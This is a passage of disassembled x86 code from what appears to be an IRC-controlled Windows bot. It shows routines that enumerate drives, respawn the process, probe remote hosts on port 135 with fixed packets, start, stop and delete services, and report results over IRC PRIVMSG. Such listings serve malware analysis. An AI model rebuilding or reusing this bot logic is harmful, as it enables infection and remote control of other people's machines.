jb short loc_40D08F
mov cl, [esi]
mov [eax], cl
inc eax
dec esi
jmp short loc_40D080
; ---------------------------------------------------------------------------
loc_40D08F: ; CODE XREF: sub_40D01A+6B�j
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40D01A endp
; =============== S U B R O U T I N E =======================================
sub_40D099 proc near ; CODE XREF: sub_40D24E+51�p
; sub_40D24E+87�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_43F6C8 ; GetDriveTypeA
sub eax, 0
jz short loc_40D0DC
dec eax
jz short loc_40D0D6
dec eax
dec eax
jz short loc_40D0D0
dec eax
jz short loc_40D0CA
dec eax
jz short loc_40D0C4
dec eax
jz short loc_40D0BE
mov eax, offset word_42DDD0
retn
; ---------------------------------------------------------------------------
loc_40D0BE: ; CODE XREF: sub_40D099+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_40D0C4: ; CODE XREF: sub_40D099+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_40D0CA: ; CODE XREF: sub_40D099+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_40D0D0: ; CODE XREF: sub_40D099+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_40D0D6: ; CODE XREF: sub_40D099+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_40D0DC: ; CODE XREF: sub_40D099+D�j
mov eax, offset aUnknown_0 ; "Unknown"
retn
sub_40D099 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D0E2 proc near ; CODE XREF: sub_40D12A+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, ds:dword_43F564
test eax, eax
jz short loc_40D117
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_40D117: ; CODE XREF: sub_40D0E2+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D0E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D12A proc near ; CODE XREF: sub_40B8D8+1F3�p
; sub_40D24E+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_40D0E2
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40D208
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40D208
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40D208
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
mov edi, offset aSkb ; "%sKB"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_41782A
add esp, 10h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_41782A
add esp, 10h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_419840
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_41782A
add esp, 10h
pop ebx
jmp short loc_40D23A
; ---------------------------------------------------------------------------
loc_40D208: ; CODE XREF: sub_40D12A+2C�j
; sub_40D12A+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_198]
push esi
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_118]
pop ecx
push esi
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_98]
pop ecx
push esi
push eax
call sub_4172AE
pop ecx
pop ecx
loc_40D23A: ; CODE XREF: sub_40D12A+DC�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40D12A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D24E proc near ; CODE XREF: sub_40D320+17�p
; sub_40D320+60�p
var_500 = byte ptr -500h
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_300]
push ebx
push eax
call sub_40D12A
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "failed"
rep movsd
push eax
call sub_4176D0
add esp, 10h
test eax, eax
jnz short loc_40D2C1
push ebx
push ebx
call sub_40D099
pop ecx
push eax
push offset unk_42E6A4
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41782A
add esp, 14h
jmp short loc_40D2F5
; ---------------------------------------------------------------------------
loc_40D2C1: ; CODE XREF: sub_40D24E+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_40D099
pop ecx
push eax
push offset unk_42E658
lea eax, [ebp+var_500]
push 200h
push eax
call sub_41782A
add esp, 20h
loc_40D2F5: ; CODE XREF: sub_40D24E+71�j
push 1
lea eax, [ebp+var_500]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_500]
push eax
call sub_40BF6D
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40D24E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D320 proc near ; CODE XREF: sub_40EE72+57EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_C], ebx
jz short loc_40D341
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D24E
add esp, 10h
jmp short loc_40D3A2
; ---------------------------------------------------------------------------
loc_40D341: ; CODE XREF: sub_40D320+9�j
push esi
push edi
push ebx
push ebx
call ds:dword_43F5D8 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_417B89
pop ecx
mov edi, eax
push edi
push esi
call ds:dword_43F5D8 ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40D399
loc_40D365: ; CODE XREF: sub_40D320+77�j
push offset aA_0 ; "A:\\"
push esi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_40D388
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D24E
add esp, 10h
loc_40D388: ; CODE XREF: sub_40D320+54�j
push esi
call sub_417AB0
cmp [esi+eax+1], bl
lea esi, [esi+eax+1]
pop ecx
jnz short loc_40D365
loc_40D399: ; CODE XREF: sub_40D320+43�j
push edi
call sub_417C3B
pop ecx
pop edi
pop esi
loc_40D3A2: ; CODE XREF: sub_40D320+1F�j
pop ebx
pop ebp
retn
sub_40D320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D3A5 proc near ; DATA XREF: sub_40E6A9+11�o
var_2A4 = dword ptr -2A4h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_4450CC
call ds:dword_43F700 ; closesocket
call sub_416F23
call ds:dword_43F5C8 ; WSACleanup
call ds:dword_43F5C8 ; WSACleanup
mov ebx, ds:dword_424064
push 64h
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_54]
pop esi
push esi
push edi
push eax
call sub_417330
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset byte_43C80C
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_424068 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:off_424094
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_424120 ; CreateProcessA
test eax, eax
jz short loc_40D46A
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:off_424078
call esi ; sub_49C3D5
push [ebp+var_C]
call esi ; sub_49C3D5
loc_40D46A: ; CODE XREF: sub_40D3A5+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_443A70
mov eax, [esp+2A4h+var_2A4]
mov large fs:0, eax
add esp, 8
push edi
call ds:off_42414C
pop edi
pop esi
pop ebx
sub_40D3A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D48D proc near ; CODE XREF: sub_40D4C5+125�p
; sub_40D4C5+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40D4BB
loc_40D49E: ; CODE XREF: sub_40D48D+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4198F0
add esp, 0Ch
test eax, eax
jz short loc_40D4C1
inc esi
cmp esi, edi
jl short loc_40D49E
loc_40D4BB: ; CODE XREF: sub_40D48D+F�j
xor al, al
loc_40D4BD: ; CODE XREF: sub_40D48D+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40D4C1: ; CODE XREF: sub_40D48D+27�j
mov al, 1
jmp short loc_40D4BD
sub_40D48D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4C5 proc near ; CODE XREF: sub_402DD7+8B�p
; sub_402DD7+174�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_417B30
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_40D506
dec eax
jz short loc_40D4E4
dec eax
loc_40D4DE: ; CODE XREF: sub_40D4C5+57�j
xor eax, eax
loc_40D4E0: ; CODE XREF: sub_40D4C5+3F�j
; sub_40D4C5+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40D4E4: ; CODE XREF: sub_40D4C5+16�j
push 3
push 1388h
push [ebp+arg_0]
call ds:dword_43F6A8 ; inet_addr
push eax
call sub_4076CA
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_40D4E0
; ---------------------------------------------------------------------------
loc_40D506: ; CODE XREF: sub_40D4C5+13�j
push 6
push 1
push 2
call ds:dword_43F6E8 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_40D4DE
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call ds:dword_43F668 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40ADCA
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43F610 ; connect
cmp eax, edi
jz loc_40D622
push ebx
push 48h
push offset dword_42E6F4
push esi
call ds:dword_43F6B8 ; send
cmp eax, edi
jz loc_40D622
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call ds:dword_43F680 ; recv
cmp eax, edi
jz loc_40D622
cmp [ebp+var_200E], 0Ch
jnz short loc_40D622
push ebx
push 18h
push offset dword_42E740
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
cmp eax, edi
jz short loc_40D622
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call ds:dword_43F680 ; recv
mov esi, eax
cmp esi, edi
jz short loc_40D622
cmp [ebp+var_200E], 2
jnz short loc_40D622
push 10h
push offset loc_42E75C
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40D48D
add esp, 10h
test al, al
jz short loc_40D602
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_40D622
; ---------------------------------------------------------------------------
loc_40D602: ; CODE XREF: sub_40D4C5+12F�j
push 10h
push offset dword_42E770
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40D48D
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_40D622: ; CODE XREF: sub_40D4C5+9B�j
; sub_40D4C5+B2�j ...
push [ebp+arg_4]
call ds:dword_43F700 ; closesocket
mov eax, ebx
pop ebx
jmp loc_40D4E0
sub_40D4C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D633 proc near ; CODE XREF: sub_40ECFA+3D�p
; sub_40EE72+1CB�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_4193FF
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
leave
retn
sub_40D633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D679 proc near ; CODE XREF: sub_401000+8B�p
; sub_40144A+76�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_40D694
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_40D694: ; CODE XREF: sub_40D679+14�j
push edi
call sub_417AB0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_417AB0
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_3 ; "%s"
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_42E784
push eax
call sub_4172AE
add esp, 14h
lea eax, [ebp+var_200]
push 0
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40D717
push 7D0h
call ds:dword_424064 ; Sleep
locret_40D717: ; CODE XREF: sub_40D679+91�j
leave
retn
sub_40D679 endp
; =============== S U B R O U T I N E =======================================
sub_40D719 proc near ; CODE XREF: sub_40EE72:loc_410F84�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_40D771
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push ds:dword_42E7A8[esi]
push edi
push eax
call sub_40D793
add esp, 14h
test eax, eax
jnz short loc_40D761
push edi
push ds:off_42E7A4[esi]
push offset dword_42E8D4
loc_40D751: ; CODE XREF: sub_40D719+56�j
mov esi, offset dword_444138
push esi
call sub_4172AE
add esp, 10h
jmp short loc_40D78E
; ---------------------------------------------------------------------------
loc_40D761: ; CODE XREF: sub_40D719+2A�j
push eax
call sub_40D835
pop ecx
push eax
push edi
push offset dword_42E89C
jmp short loc_40D751
; ---------------------------------------------------------------------------
loc_40D771: ; CODE XREF: sub_40D719+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_444138
push ds:off_42E7A0[eax*4]
push offset dword_42E868
push esi
call sub_4172AE
add esp, 0Ch
loc_40D78E: ; CODE XREF: sub_40D719+46�j
mov eax, esi
pop edi
pop esi
retn
sub_40D719 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D793 proc near ; CODE XREF: sub_40D719+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call ds:dword_43F65C ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_40D7BA
call ds:dword_42408C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40D82F
; ---------------------------------------------------------------------------
loc_40D7BA: ; CODE XREF: sub_40D793+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call ds:dword_43F550 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40D7DA
call ds:dword_42408C ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_40D827
; ---------------------------------------------------------------------------
loc_40D7DA: ; CODE XREF: sub_40D793+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40D80D
cmp eax, 3
jz short loc_40D7FE
jle short loc_40D820
cmp eax, 6
jg short loc_40D820
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call ds:dword_43F5B8 ; ControlService
jmp short loc_40D814
; ---------------------------------------------------------------------------
loc_40D7FE: ; CODE XREF: sub_40D793+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call ds:dword_43F558 ; StartServiceA
jmp short loc_40D814
; ---------------------------------------------------------------------------
loc_40D80D: ; CODE XREF: sub_40D793+4D�j
push esi
call ds:dword_43F5BC ; DeleteService
loc_40D814: ; CODE XREF: sub_40D793+69�j
; sub_40D793+78�j
test eax, eax
jnz short loc_40D820
call ds:dword_42408C ; RtlGetLastWin32Error
mov ebx, eax
loc_40D820: ; CODE XREF: sub_40D793+54�j
; sub_40D793+59�j ...
push esi
call ds:dword_43F56C ; CloseServiceHandle
loc_40D827: ; CODE XREF: sub_40D793+45�j
push edi
call ds:dword_43F56C ; CloseServiceHandle
pop esi
loc_40D82F: ; CODE XREF: sub_40D793+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40D793 endp
; =============== S U B R O U T I N E =======================================
sub_40D835 proc near ; CODE XREF: sub_40D719+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40D8EA
jz loc_40D8E3
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40D8AD
jz short loc_40D8A3
mov ecx, eax
sub ecx, 3
jz short loc_40D899
dec ecx
dec ecx
jz short loc_40D88F
dec ecx
jz short loc_40D885
sub ecx, 51h
jz short loc_40D87B
sub ecx, 24h
jnz loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D87B: ; CODE XREF: sub_40D835+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D885: ; CODE XREF: sub_40D835+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D88F: ; CODE XREF: sub_40D835+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D899: ; CODE XREF: sub_40D835+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8A3: ; CODE XREF: sub_40D835+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8AD: ; CODE XREF: sub_40D835+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40D8DC
dec ecx
jz short loc_40D8D5
dec ecx
jz short loc_40D8CE
dec ecx
jnz loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_40D952
; ---------------------------------------------------------------------------
loc_40D8CE: ; CODE XREF: sub_40D835+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8D5: ; CODE XREF: sub_40D835+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8DC: ; CODE XREF: sub_40D835+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8E3: ; CODE XREF: sub_40D835+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D8EA: ; CODE XREF: sub_40D835+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
jz short loc_40D94D
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40D960 ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_40D9A1[ecx]
jmp off_40D979[ecx*4] ; switch jump
loc_40D90E: ; DATA XREF: _0:off_40D979�o
push offset aTheSpecifiedDa ; jumptable 0040D907 case 7
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D915: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceDepe ; jumptable 0040D907 case 17
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D91C: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceDe_0 ; jumptable 0040D907 case 10
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D923: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHasB ; jumptable 0040D907 case 0
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D92A: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheSpecified_0 ; jumptable 0040D907 case 2
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D931: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceCoul ; jumptable 0040D907 case 11
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D938: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHa_0 ; jumptable 0040D907 case 14
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D93F: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheRequested_1 ; jumptable 0040D907 case 3
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D946: ; CODE XREF: sub_40D835+D2�j
; DATA XREF: _0:off_40D979�o
push offset aTheServiceHasN ; jumptable 0040D907 case 4
jmp short loc_40D952
; ---------------------------------------------------------------------------
loc_40D94D: ; CODE XREF: sub_40D835+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_40D952: ; CODE XREF: sub_40D835+41�j
; sub_40D835+4B�j ...
push offset dword_443A78
call sub_4172AE
pop ecx
pop ecx
jmp short loc_40D973
; ---------------------------------------------------------------------------
loc_40D960: ; CODE XREF: sub_40D835+36�j
; sub_40D835+89�j ...
push eax ; default
; jumptable 0040D907 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_443A78
call sub_4172AE
add esp, 0Ch
loc_40D973: ; CODE XREF: sub_40D835+129�j
mov eax, offset dword_443A78
retn
sub_40D835 endp
; ---------------------------------------------------------------------------
off_40D979 dd offset loc_40D923 ; DATA XREF: sub_40D835+D2�r
dd offset loc_40D92A ; jump table for switch statement
dd offset loc_40D93F
dd offset loc_40D946
dd offset loc_40D90E
dd offset loc_40D91C
dd offset loc_40D931
dd offset loc_40D938
dd offset loc_40D915
dd offset loc_40D960
byte_40D9A1 db 0, 9, 1, 2 ; DATA XREF: sub_40D835+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9B3 proc near ; CODE XREF: sub_40EE72+2094�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call ds:dword_43F65C ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_40D9EB: ; CODE XREF: sub_40D9B3+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call ds:dword_43F628 ; EnumServicesStatusA
test eax, eax
jnz short loc_40DA25
call ds:dword_42408C ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_40DAD9
loc_40DA25: ; CODE XREF: sub_40D9B3+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40DAD0
lea esi, [ebp+var_188]
loc_40DA36: ; CODE XREF: sub_40D9B3+117�j
mov eax, [esi+8]
dec eax
jz short loc_40DA7F
dec eax
jz short loc_40DA78
dec eax
jz short loc_40DA71
dec eax
jz short loc_40DA6A
dec eax
jz short loc_40DA63
dec eax
jz short loc_40DA5C
dec eax
jz short loc_40DA55
push offset aUnknown_1 ; " Unknown"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA55: ; CODE XREF: sub_40D9B3+99�j
push offset aPaused_0 ; " Paused"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA5C: ; CODE XREF: sub_40D9B3+96�j
push offset aPausing ; " Pausing"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA63: ; CODE XREF: sub_40D9B3+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA6A: ; CODE XREF: sub_40D9B3+90�j
push offset aRunning ; " Running"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA71: ; CODE XREF: sub_40D9B3+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA78: ; CODE XREF: sub_40D9B3+8A�j
push offset aStarting ; " Starting"
jmp short loc_40DA84
; ---------------------------------------------------------------------------
loc_40DA7F: ; CODE XREF: sub_40D9B3+87�j
push offset aStopped ; " Stopped"
loc_40DA84: ; CODE XREF: sub_40D9B3+A0�j
; sub_40D9B3+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_20]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS ; "%s: %s (%s)"
push eax
call sub_4172AE
push 1
lea eax, [ebp+var_38C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 28h
inc edi
add esi, 24h
